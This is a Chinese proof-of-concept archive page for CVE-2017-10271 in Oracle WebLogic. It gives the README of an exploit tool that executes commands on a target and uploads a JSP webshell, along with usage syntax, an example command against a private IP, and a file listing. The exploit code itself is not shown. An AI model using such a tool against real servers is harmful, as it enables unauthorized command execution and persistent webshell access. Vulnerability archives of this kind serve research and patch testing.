关联漏洞
            
        
            描述
            CVE-2017-10271
        
        
            介绍
            #### 简易说明
+ 命令执行并回显
+ 直接上传shell
+ linux下weblogic 10.3.6.0测试OK
#### 使用方法
+ python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001
```bash
usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL]
optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        weblogic ip and port(eg -> 172.16.80.131:7001)
  -c CMD, --cmd CMD     command to execute,default is "id"
  -o OUTPUT, --output OUTPUT
                        output file name,default is output.txt
  -s SHELL, --shell SHELL
                        local jsp file name to upload,and set -o xxx.jsp
```
Example:
~~~
python2 weblogic_wls_wsat_exp_win.py -t 192.168.174.144:7001 -c "whoami"
~~~

        
        文件快照
        
            
                
 [4.0K]  /data/pocs/9ae28ea23286f00c3f683eb074b8e9e853462261
├── [1.1K]  exec.jsp
├── [ 53K]  execute_command.png
├── [ 831]  README.md
├── [2.8K]  weblogic_check_version.py
├── [6.5K]  weblogic_wls_wsat_exp.py
└── [4.4K]  weblogic_wls_wsat_exp_win.py
0 directories, 6 files
                
             
         
        备注
        
            
                1. 建议优先通过来源进行访问。
                2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
                3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。